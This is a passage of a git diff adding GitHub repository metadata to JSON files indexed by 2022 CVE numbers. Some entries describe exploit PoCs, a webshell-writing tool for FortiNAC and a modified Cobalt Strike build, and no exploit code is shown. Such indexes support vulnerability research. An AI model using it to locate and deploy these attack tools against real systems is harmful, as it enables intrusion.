+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25763545?v=4",
+ "html_url": "https:\/\/github.com\/veritas501"
+ },
+ "html_url": "https:\/\/github.com\/veritas501\/CVE-2022-3910",
+ "description": "CVE-2022-3910",
+ "fork": false,
+ "created_at": "2023-03-14T07:22:25Z",
+ "updated_at": "2024-02-05T16:03:57Z",
+ "pushed_at": "2023-03-14T11:58:41Z",
+ "stargazers_count": 10,
+ "watchers_count": 10,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 10,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-39197.json b/2022/CVE-2022-39197.json
index 37defa0a99..1218fcf75b 100644
--- a/2022/CVE-2022-39197.json
+++ b/2022/CVE-2022-39197.json
@@ -397,6 +397,36 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 633726927,
+ "name": "pig_CS4.4",
+ "full_name": "xiao-zhu-zhu\/pig_CS4.4",
+ "owner": {
+ "login": "xiao-zhu-zhu",
+ "id": 85468097,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85468097?v=4",
+ "html_url": "https:\/\/github.com\/xiao-zhu-zhu"
+ },
+ "html_url": "https:\/\/github.com\/xiao-zhu-zhu\/pig_CS4.4",
+ "description": "Cobalt Strike 4.4 猪猪版 去暗桩 去流量特征 beacon仿造真实API服务 修补CVE-2022-39197补丁",
+ "fork": false,
+ "created_at": "2023-04-28T06:31:38Z",
+ "updated_at": "2024-05-30T09:56:01Z",
+ "pushed_at": "2023-04-28T07:10:00Z",
+ "stargazers_count": 33,
+ "watchers_count": 33,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 33,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 726816567,
"name": "Gui-poc-test",
diff --git a/2022/CVE-2022-39253.json b/2022/CVE-2022-39253.json
index 8a7f958c6b..17d3f349a8 100644
--- a/2022/CVE-2022-39253.json
+++ b/2022/CVE-2022-39253.json
@@ -28,5 +28,35 @@
"watchers": 10,
"score": 0,
"subscribers_count": 1
+ },
+ {
+ "id": 640961335,
+ "name": "NetworkSecurityFinalProject",
+ "full_name": "HiImDarwin\/NetworkSecurityFinalProject",
+ "owner": {
+ "login": "HiImDarwin",
+ "id": 53218645,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53218645?v=4",
+ "html_url": "https:\/\/github.com\/HiImDarwin"
+ },
+ "html_url": "https:\/\/github.com\/HiImDarwin\/NetworkSecurityFinalProject",
+ "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-39253",
+ "fork": false,
+ "created_at": "2023-05-15T13:40:17Z",
+ "updated_at": "2023-05-15T13:40:17Z",
+ "pushed_at": "2023-05-15T15:36:20Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
}
]
\ No newline at end of file
diff --git a/2022/CVE-2022-39952.json b/2022/CVE-2022-39952.json
new file mode 100644
index 0000000000..f6d057abb1
--- /dev/null
+++ b/2022/CVE-2022-39952.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 604210945,
+ "name": "CVE-2022-39952",
+ "full_name": "horizon3ai\/CVE-2022-39952",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2022-39952",
+ "description": "POC for CVE-2022-39952",
+ "fork": false,
+ "created_at": "2023-02-20T15:12:33Z",
+ "updated_at": "2024-06-05T16:35:40Z",
+ "pushed_at": "2023-02-25T08:52:03Z",
+ "stargazers_count": 267,
+ "watchers_count": 267,
+ "has_discussions": false,
+ "forks_count": 56,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 56,
+ "watchers": 267,
+ "score": 0,
+ "subscribers_count": 8
+ },
+ {
+ "id": 604936934,
+ "name": "CVE-2022-39952_webshell",
+ "full_name": "shiyeshu\/CVE-2022-39952_webshell",
+ "owner": {
+ "login": "shiyeshu",
+ "id": 23716358,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23716358?v=4",
+ "html_url": "https:\/\/github.com\/shiyeshu"
+ },
+ "html_url": "https:\/\/github.com\/shiyeshu\/CVE-2022-39952_webshell",
+ "description": "Write Behinder_webshell to target using CVE-2022-39952",
+ "fork": false,
+ "created_at": "2023-02-22T04:57:06Z",
+ "updated_at": "2023-02-22T06:36:43Z",
+ "pushed_at": "2023-02-22T05:01:29Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 606840385,
+ "name": "CVE-2022-39952",
+ "full_name": "Chocapikk\/CVE-2022-39952",
+ "owner": {
+ "login": "Chocapikk",
+ "id": 88535377,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4",
+ "html_url": "https:\/\/github.com\/Chocapikk"
+ },
+ "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2022-39952",
+ "description": "PoC for CVE-2022-39952 affecting Fortinet FortiNAC.",
+ "fork": false,
+ "created_at": "2023-02-26T18:10:04Z",
+ "updated_at": "2023-12-19T11:44:47Z",
+ "pushed_at": "2023-02-26T18:13:50Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 2
+ },
+ {
+ "id": 619925116,
+ "name": "CVE-2022-39952-better",
+ "full_name": "dkstar11q\/CVE-2022-39952-better",
+ "owner": {
+ "login": "dkstar11q",
+ "id": 123830677,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123830677?v=4",
+ "html_url": "https:\/\/github.com\/dkstar11q"
+ },
+ "html_url": "https:\/\/github.com\/dkstar11q\/CVE-2022-39952-better",
+ "description": "PoC for CVE-2022-39952 affecting Fortinet FortiNAC.",
+ "fork": false,
+ "created_at": "2023-03-27T17:25:17Z",
+ "updated_at": "2023-02-26T18:26:27Z",
+ "pushed_at": "2023-02-26T18:13:50Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-40363.json b/2022/CVE-2022-40363.json
new file mode 100644
index 0000000000..e31b83e587
--- /dev/null
+++ b/2022/CVE-2022-40363.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 590734045,
+ "name": "CVE-2022-40363",
+ "full_name": "Olafdaf\/CVE-2022-40363",
+ "owner": {
+ "login": "Olafdaf",
+ "id": 123042506,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/123042506?v=4",
+ "html_url": "https:\/\/github.com\/Olafdaf"
+ },
+ "html_url": "https:\/\/github.com\/Olafdaf\/CVE-2022-40363",
+ "description": "A buffer overflow in the component nfc_device_load_mifare_ul_data of Flipper Devices Inc., Flipper Zero before v0.65.2 allows attackers to cause a Denial of Service (DoS) via a crafted NFC file. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-19T04:19:42Z",
+ "updated_at": "2023-12-05T04:28:03Z",
+ "pushed_at": "2022-12-29T11:12:27Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-40684.json b/2022/CVE-2022-40684.json
index 15ffd33cb7..cc4ba5a903 100644
--- a/2022/CVE-2022-40684.json
+++ b/2022/CVE-2022-40684.json
@@ -615,6 +615,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 589898622,
+ "name": "CVE-2022-40684-Rust",
+ "full_name": "notareaperbutDR34P3r\/CVE-2022-40684-Rust",
+ "owner": {
+ "login": "notareaperbutDR34P3r",
+ "id": 118025285,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4",
+ "html_url": "https:\/\/github.com\/notareaperbutDR34P3r"
+ },
+ "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/CVE-2022-40684-Rust",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-01-17T07:49:25Z",
+ "updated_at": "2023-01-17T08:08:39Z",
+ "pushed_at": "2023-01-17T08:08:35Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 607300331,
+ "name": "CVE-2022-40684",
+ "full_name": "z-bool\/CVE-2022-40684",
+ "owner": {
+ "login": "z-bool",
+ "id": 111605994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111605994?v=4",
+ "html_url": "https:\/\/github.com\/z-bool"
+ },
+ "html_url": "https:\/\/github.com\/z-bool\/CVE-2022-40684",
+ "description": "一键枚举所有用户名以及写入SSH公钥",
+ "fork": false,
+ "created_at": "2023-02-27T18:05:34Z",
+ "updated_at": "2023-03-21T04:01:30Z",
+ "pushed_at": "2023-02-27T18:10:44Z",
+ "stargazers_count": 5,
+ "watchers_count": 5,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 5,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 691773632,
"name": "CVE-2022-40684",
diff --git a/2022/CVE-2022-40769.json b/2022/CVE-2022-40769.json
new file mode 100644
index 0000000000..df2a86fbcf
--- /dev/null
+++ b/2022/CVE-2022-40769.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 594246349,
+ "name": "CVE-2022-40769",
+ "full_name": "PLSRcoin\/CVE-2022-40769",
+ "owner": {
+ "login": "PLSRcoin",
+ "id": 99826299,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99826299?v=4",
+ "html_url": "https:\/\/github.com\/PLSRcoin"
+ },
+ "html_url": "https:\/\/github.com\/PLSRcoin\/CVE-2022-40769",
+ "description": "profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-28T00:12:31Z",
+ "updated_at": "2023-02-20T14:52:04Z",
+ "pushed_at": "2022-12-29T15:29:39Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-40799.json b/2022/CVE-2022-40799.json
new file mode 100644
index 0000000000..2bec70116e
--- /dev/null
+++ b/2022/CVE-2022-40799.json
@@ -0,0 +1,36 @@
+[
+ {
+ "id": 631698732,
+ "name": "CVE-2022-40799",
+ "full_name": "rtfmkiesel\/CVE-2022-40799",
+ "owner": {
+ "login": "rtfmkiesel",
+ "id": 79413747,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79413747?v=4",
+ "html_url": "https:\/\/github.com\/rtfmkiesel"
+ },
+ "html_url": "https:\/\/github.com\/rtfmkiesel\/CVE-2022-40799",
+ "description": "D-Link DNR-322L - Authenticated Remote Code Execution",
+ "fork": false,
+ "created_at": "2023-04-23T20:42:18Z",
+ "updated_at": "2023-09-13T21:48:44Z",
+ "pushed_at": "2023-04-23T20:42:28Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "dlink",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-40881.json b/2022/CVE-2022-40881.json
new file mode 100644
index 0000000000..280dfa0161
--- /dev/null
+++ b/2022/CVE-2022-40881.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 606333124,
+ "name": "CVE-2022-40881",
+ "full_name": "yilin1203\/CVE-2022-40881",
+ "owner": {
+ "login": "yilin1203",
+ "id": 71480339,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71480339?v=4",
+ "html_url": "https:\/\/github.com\/yilin1203"
+ },
+ "html_url": "https:\/\/github.com\/yilin1203\/CVE-2022-40881",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-25T06:54:52Z",
+ "updated_at": "2023-02-27T01:21:09Z",
+ "pushed_at": "2023-02-25T07:31:12Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-4096.json b/2022/CVE-2022-4096.json
new file mode 100644
index 0000000000..afbda842ed
--- /dev/null
+++ b/2022/CVE-2022-4096.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 640557970,
+ "name": "CVE-2022-4096",
+ "full_name": "aminetitrofine\/CVE-2022-4096",
+ "owner": {
+ "login": "aminetitrofine",
+ "id": 70074517,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074517?v=4",
+ "html_url": "https:\/\/github.com\/aminetitrofine"
+ },
+ "html_url": "https:\/\/github.com\/aminetitrofine\/CVE-2022-4096",
+ "description": "This experiment is destinated to demonstrate how the DNS rebinding attack works on an emulated IoT. In the setup, we have a simulated IoT device, which can be controlled through a web interface (this is typical for many IoT devices).",
+ "fork": false,
+ "created_at": "2023-05-14T13:47:05Z",
+ "updated_at": "2023-05-14T13:50:54Z",
+ "pushed_at": "2023-05-14T13:50:49Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41034.json b/2022/CVE-2022-41034.json
new file mode 100644
index 0000000000..1fa7743754
--- /dev/null
+++ b/2022/CVE-2022-41034.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 637284460,
+ "name": "CVE-2022-41034",
+ "full_name": "andyhsu024\/CVE-2022-41034",
+ "owner": {
+ "login": "andyhsu024",
+ "id": 131547485,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/131547485?v=4",
+ "html_url": "https:\/\/github.com\/andyhsu024"
+ },
+ "html_url": "https:\/\/github.com\/andyhsu024\/CVE-2022-41034",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-05-07T04:30:30Z",
+ "updated_at": "2023-05-07T04:30:30Z",
+ "pushed_at": "2023-06-11T13:17:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41076.json b/2022/CVE-2022-41076.json
new file mode 100644
index 0000000000..301bdad6f9
--- /dev/null
+++ b/2022/CVE-2022-41076.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 595651423,
+ "name": "CVE-2022-41076",
+ "full_name": "5l1v3r1\/CVE-2022-41076",
+ "owner": {
+ "login": "5l1v3r1",
+ "id": 34143537,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34143537?v=4",
+ "html_url": "https:\/\/github.com\/5l1v3r1"
+ },
+ "html_url": "https:\/\/github.com\/5l1v3r1\/CVE-2022-41076",
+ "description": "PowerShell Remote Code Execution Vulnerability. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-31T14:32:39Z",
+ "updated_at": "2023-02-20T12:06:24Z",
+ "pushed_at": "2022-12-27T16:03:57Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41082.json b/2022/CVE-2022-41082.json
index 8b7b463a72..20464e6e28 100644
--- a/2022/CVE-2022-41082.json
+++ b/2022/CVE-2022-41082.json
@@ -127,6 +127,66 @@
"score": 0,
"subscribers_count": 1
},
+ {
+ "id": 604424331,
+ "name": "CVE-2022-41082-POC",
+ "full_name": "bigherocenter\/CVE-2022-41082-POC",
+ "owner": {
+ "login": "bigherocenter",
+ "id": 117562871,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/117562871?v=4",
+ "html_url": "https:\/\/github.com\/bigherocenter"
+ },
+ "html_url": "https:\/\/github.com\/bigherocenter\/CVE-2022-41082-POC",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-02-21T02:59:46Z",
+ "updated_at": "2023-02-21T03:00:00Z",
+ "pushed_at": "2023-02-21T02:59:55Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 617641356,
+ "name": "vuln-CVE-2022-41082",
+ "full_name": "notareaperbutDR34P3r\/vuln-CVE-2022-41082",
+ "owner": {
+ "login": "notareaperbutDR34P3r",
+ "id": 118025285,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118025285?v=4",
+ "html_url": "https:\/\/github.com\/notareaperbutDR34P3r"
+ },
+ "html_url": "https:\/\/github.com\/notareaperbutDR34P3r\/vuln-CVE-2022-41082",
+ "description": "https & http",
+ "fork": false,
+ "created_at": "2023-03-22T20:04:07Z",
+ "updated_at": "2023-03-22T20:11:03Z",
+ "pushed_at": "2023-03-22T20:10:58Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
{
"id": 686757637,
"name": "CVE-2022-41082",
diff --git a/2022/CVE-2022-41099.json b/2022/CVE-2022-41099.json
new file mode 100644
index 0000000000..c9734883ab
--- /dev/null
+++ b/2022/CVE-2022-41099.json
@@ -0,0 +1,122 @@
+[
+ {
+ "id": 588734636,
+ "name": "UpdateWindowsRE-CVE-2022-41099",
+ "full_name": "halsey51013\/UpdateWindowsRE-CVE-2022-41099",
+ "owner": {
+ "login": "halsey51013",
+ "id": 30665665,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30665665?v=4",
+ "html_url": "https:\/\/github.com\/halsey51013"
+ },
+ "html_url": "https:\/\/github.com\/halsey51013\/UpdateWindowsRE-CVE-2022-41099",
+ "description": "Script to update Windows Recovery Environment to patch against CVE-2022-41099",
+ "fork": false,
+ "created_at": "2023-01-13T21:27:03Z",
+ "updated_at": "2023-03-28T22:30:38Z",
+ "pushed_at": "2023-01-20T10:31:58Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 589494963,
+ "name": "CVE-2022-41099-Fix",
+ "full_name": "o0MattE0o\/CVE-2022-41099-Fix",
+ "owner": {
+ "login": "o0MattE0o",
+ "id": 80461805,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80461805?v=4",
+ "html_url": "https:\/\/github.com\/o0MattE0o"
+ },
+ "html_url": "https:\/\/github.com\/o0MattE0o\/CVE-2022-41099-Fix",
+ "description": "Update WINRE.WIM file to fix CVE-2022-41099",
+ "fork": false,
+ "created_at": "2023-01-16T08:57:29Z",
+ "updated_at": "2024-06-04T11:02:47Z",
+ "pushed_at": "2023-04-25T09:47:46Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 595717372,
+ "name": "WinRE-Patch",
+ "full_name": "g-gill24\/WinRE-Patch",
+ "owner": {
+ "login": "g-gill24",
+ "id": 18432629,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18432629?v=4",
+ "html_url": "https:\/\/github.com\/g-gill24"
+ },
+ "html_url": "https:\/\/github.com\/g-gill24\/WinRE-Patch",
+ "description": "Patches CVE-2022-41099",
+ "fork": false,
+ "created_at": "2023-01-31T17:06:13Z",
+ "updated_at": "2023-01-31T17:07:16Z",
+ "pushed_at": "2023-01-31T17:07:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 627897478,
+ "name": "KB5025175-CVE-2022-41099",
+ "full_name": "dsn1321\/KB5025175-CVE-2022-41099",
+ "owner": {
+ "login": "dsn1321",
+ "id": 37174087,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37174087?v=4",
+ "html_url": "https:\/\/github.com\/dsn1321"
+ },
+ "html_url": "https:\/\/github.com\/dsn1321\/KB5025175-CVE-2022-41099",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-04-14T12:48:39Z",
+ "updated_at": "2023-04-14T12:49:26Z",
+ "pushed_at": "2023-04-14T14:26:09Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41114.json b/2022/CVE-2022-41114.json
new file mode 100644
index 0000000000..8a62bab301
--- /dev/null
+++ b/2022/CVE-2022-41114.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 584184679,
+ "name": "CVE-2022-41114",
+ "full_name": "gmh5225\/CVE-2022-41114",
+ "owner": {
+ "login": "gmh5225",
+ "id": 13917777,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4",
+ "html_url": "https:\/\/github.com\/gmh5225"
+ },
+ "html_url": "https:\/\/github.com\/gmh5225\/CVE-2022-41114",
+ "description": "Windows Bind Filter Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice",
+ "fork": false,
+ "created_at": "2023-01-01T18:30:30Z",
+ "updated_at": "2023-02-20T12:35:54Z",
+ "pushed_at": "2022-12-28T09:34:52Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41333.json b/2022/CVE-2022-41333.json
new file mode 100644
index 0000000000..8a1a06609a
--- /dev/null
+++ b/2022/CVE-2022-41333.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 612324416,
+ "name": "CVE-2022-41333",
+ "full_name": "polar0x\/CVE-2022-41333",
+ "owner": {
+ "login": "polar0x",
+ "id": 115294515,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/115294515?v=4",
+ "html_url": "https:\/\/github.com\/polar0x"
+ },
+ "html_url": "https:\/\/github.com\/polar0x\/CVE-2022-41333",
+ "description": "FortiRecorder Denial of Service Exploit (CVE-2022-41333)",
+ "fork": false,
+ "created_at": "2023-03-10T17:29:09Z",
+ "updated_at": "2023-09-11T16:07:58Z",
+ "pushed_at": "2023-03-14T15:41:42Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41343.json b/2022/CVE-2022-41343.json
new file mode 100644
index 0000000000..16d622cfd4
--- /dev/null
+++ b/2022/CVE-2022-41343.json
@@ -0,0 +1,37 @@
+[
+ {
+ "id": 602302259,
+ "name": "CVE-2022-41343",
+ "full_name": "BKreisel\/CVE-2022-41343",
+ "owner": {
+ "login": "BKreisel",
+ "id": 1513073,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1513073?v=4",
+ "html_url": "https:\/\/github.com\/BKreisel"
+ },
+ "html_url": "https:\/\/github.com\/BKreisel\/CVE-2022-41343",
+ "description": "🐍 Python Exploit for CVE-2022-23935",
+ "fork": false,
+ "created_at": "2023-02-15T23:17:55Z",
+ "updated_at": "2024-01-17T19:11:33Z",
+ "pushed_at": "2023-02-17T18:37:12Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "cve",
+ "cve-2022-41343",
+ "exploit",
+ "python"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2022/CVE-2022-41352.json b/2022/CVE-2022-41352.json
index 3a32bfccb5..93a52207a7 100644
--- a/2022/CVE-2022-41352.json
+++ b/2022/CVE-2022-41352.json
@@ -66,6 +66,36 @@
"score": 0,
"subscribers_count": 2
},
+ {
+ "id": 651133271,
+ "name": "cve-2022-41352-zimbra-rce-1",
+ "full_name": "lolminerxmrig\/cve-2022-41352-zimbra-rce-1",
+ "owner": {
+ "login": "lolminerxmrig",
+ "id": 108659226,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108659226?v=4",
+ "html_url": "https:\/\/github.com\/lolminerxmrig"
+ },
+ "html_url": "https:\/\/github.com\/lolminerxmrig\/cve-2022-41352-zimbra-rce-1",
+ "description": null,
+ "fork": false,
+ "created_at": "2023-06-08T15:08:23Z",
+ "updated_at": "2023-12-10T16:15:47Z",
+ "pushed_at": "2022-11-21T07:10:46Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ },
{
"id": 729969528,
"name": "cve-2022-41352-zimbra-rce",
diff --git a/2022/CVE-2022-41544.json b/2022/CVE-2022-41544.json
new file mode 100644
index 0000000000..4bc4a1bf46
--- /dev/null
+++ b/2022/CVE-2022-41544.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 641008000,
+ "name": "CVE-2022-41544",
